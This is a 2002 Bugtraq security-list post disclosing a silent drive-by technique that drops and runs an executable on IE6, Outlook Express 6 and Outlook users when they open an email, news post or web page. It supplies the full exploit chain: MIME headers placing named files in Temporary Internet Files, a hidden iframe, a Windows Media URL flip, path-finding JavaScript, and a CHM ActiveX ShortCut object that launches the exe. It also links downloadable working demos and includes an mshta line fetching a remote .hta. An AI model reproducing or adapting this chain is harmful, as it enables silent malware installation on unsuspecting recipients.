[24860] in bugtraq
HELP.dropper: IE6, OE6, Outlook...lookOut
daemon@ATHENA.MIT.EDU (http-equiv@excite.com)
Thu Mar 28 12:11:29 2002
Message-Id: <200203280737.g2S7bwLW093833@mail1.megamailservers.com>
Date: Thu, 28 Mar 2002 07:37:58 -0000
To: <bugtraq@securityfocus.com>, <NTBugtraq@listserv.ntbugtraq.com>
From: "http-equiv@excite.com" <http-equiv@malware.com>
Cc: <vuln-dev@securityfocus.com>, <focus-ms@securityfocus.com>
Reply-To: http-equiv@malware.com
Thursday, 28 March, 2002
Silent delivery and installation of an executable on a target
computer. No client input other than opening an email or newsgroup
post or web site. This can be accomplished with the default
installation of Internet Explorer 6.0, Outlook Express 6.0 and
probably Outlook and Outlook 2002 and whatever other Outlook's there
are. Default settings for Outlook Express and Outlook: restricted
zone.
This is by no means trivial.
The Key:
Internet explorer and accompanying mail and news clients divert all
external files into the Temporary Internet File (TIF) which is
controlled by the various security settings of the browser. If we can
strategically place our named files inside the TIF and determine
their exact location, we are in business.
How Do We Do That:
Recent bandages applied to Internet Explorer currently transfer files
from mail and news to the TIF without given names and with a TMP
extension. Technically the mail client is able to determine the
contents of these *.TMP files through the Content-ID protocol
(cid:malware) whether the file is a sound file, html file, image file
etc. and based on the contents coupled with the given Content-Type:
image/gif render or parse accordingly.
Through trivial html we are able to restore our given file names and
dictate where our files are to be placed inside the TIF.
Content-Type: audio/x-ms-wma;
name="malware.wma"
Content-Transfer-Encoding: base64
Content-ID: <mrs.malware>
Content-Location: file:///malware.wma
In order to ensure all our files end up in the same folder within the
TIF, we encapsulate the entire "package" in MIME base64 so that as
the self-contained mail message is opened within a particular folder
in the TIF, so all the required files are transferred instantly and
silently into that same particular folder.
[screen shot: http://www.malware.com/ca$h.png 11KB]
And:
Now that we have our named files in our known location inside the
TIF, we need to access them to trigger off the entire event. We
utilise the multi-purpose Windows Media Player and its assortment of
files. We create a very simple media file with 0s URL flip and point
that to our named file in our known location.
<iframe src="cid:mrs.malware" style="display:none">
Content-Type: audio/x-ms-wma;
name="malware.wma"
Content-Transfer-Encoding: base64
Content-ID: <mrs.malware>
Content-Location: file:///malware.wma
Our named file it points to is a very simple *.html file comprising
our scripting to determine the location like so:
malware=document.URL;
path=malware.substr(-0,malware.lastIndexOf("\\"));
path=unescape(path);
With this information, we utilise an existing possibility to call our
named *.chm file which has been delivered to the TIF along with our
primary message and open it. Inside our *.chm we include a more
sophisticated scripting to determine yet again the location of our
third file, our *.exe which has also been delivered along with our
primary message:
var malware="malware[1].exe";
document.writeln('<OBJECT id=AA classid="clsid:adb880a6-d8ff-11cf-
9377-00aa003b7a11" width=10 height=10>');
document.writeln('<PARAM name="Command" value="ShortCut">');
document.writeln(' <PARAM name="Item1"
value=",'+cool.path+malware+',">');
document.writeln('</OBJECT>');
setTimeout("AA.Click();",3000);
[screen shot: http://www.malware.com/ca$h.png 11KB]
This inturn fires our *.exe that we have dropped into the TIF.
Critical Note: it is imperative that our media file is delivered to
the TIF and opened from within the TIF through MIME encapsulation.
Without out this the URL filp when triggered will expect to find the
referenced file name on the server.
Repeat:
1. Our mail message or news post containing our 4 critical files
[*.html, *.chm, *.wma, *.exe] is fired off to the unsuspecting
recipient.
2. Upon opening the mail or news message, all embedded files are
instantly transferred to the TIF with our given file names. Note:
this is in addition to the exact same files transferred in accordance
with security as *.TMP files. Our 0s media file is then automatically
opened by our iframe. This inturn launches the Windows Media Player
which immediately URL flips to our named *.html file. Obviously,
because the media file resides in the same folder inside the TIF as
our *.html file, it will call the *.html file.
3. Our *.html file is then opened in a new browser window along with
the full path name of its location. Our scripting to determine the
location and write it inside our *.html is fired. This inturn calls
our *.chm file which is opened.
4. Our *.chm file is opened and our sophisticated scripting to
determine the location inside that, then calls our *.exe which also
resides in the same folder inside the TIF:
[screen shot: http://www.malware.com/ca$h.png 11KB]
BANG!
The above represents by far the most successful method to achieve
this. Primarily because we can (a) dictate our file names and (b)
ensure all necessary files are transferred to the same folder within
the TIF.
In the case of Outlook Express default settings and Outlook default
settings, where no scripting and no activex is allowed. We can
achieve similar results substituting our method of file transference
in the above, with a less than robust method. Simply put:
a) embedded media file in iframe -- automatically opened from with in
the TIF -- no scripting
b) generic html tags <img src=malware.html...<bgsound src=*.chm...etc
will deposit our required files inside the TIF-- no scripting but not
always in the same folder. To do this we need to draw the files
remotely from a server in order to ensure they are transferred with
given file names. 5 out of 10 times we can achieve success but in
typical fashion the Internet Explorer 6 browser under unidentifiable
conditions (at whim), can transfer each file into different folders
inside the TIF.
In the case of Internet Explorer 6 simply converting our mail or news
message to *.mhtml format and in particular our first scenario above
where all files are embedded, results in 99.999% success. Obviously
that 1% being the most important, and that is launching the Windows
Media Player in order to invoke our URL flip. No matter how examined,
despite all necessary files with file names being in the known
location, it simply refuses interpret the path to the media
file.Without a doubt a solution is out there but we are out of time.
Working Examples:
Tested on fully patched Internet Explorer 6 and Outlook Express 6 on
win98
NOTE: all have about a 20 second delay
1. All files fully embedded in the mail message. Open in mail client
in internet zone:
Includes harmless *.exe
http://www.malware.com/oxpress.zip
note: there can be a possibility that the resulting file name after
transference differs from OS to OS.
2. Media file fully embedded, all other files remotely retrieved.
Open in mail client in restricted zone.
Includes harmless *.exe
http://www.malware.com/outlook.zip
note 1: there is a great possibility that the resulting transference
is to different folders within the TIF.
note 2: this is definitely not fool proof but by decreasing the
amount of required files i.e. only *.chm and *.html with
incorporation of the previous:
C:\WINDOWS\SYSTEM\Mshta.exe,http://www.malware.com/foobar.hta
link we can leave out the *.exe as it would appear that the more
files transferred the more chances are different folders inside the
TIF are used.
3. For Internet Explorer 6, simply convert 1 above to *.mhtml format
and give it a whack. Perhaps some bright spark knows how to remedy
this one. Good Luck !
4. For the very few interested, we managed to compile an *.hta file
into a *.chm as well as a RFC822 mail message. Behaviour results in
the same as IE6. Nothing spectacular. Technically interesting results:
http://www.malware.com/chm.zip
End Call
--
http://www.malware.com
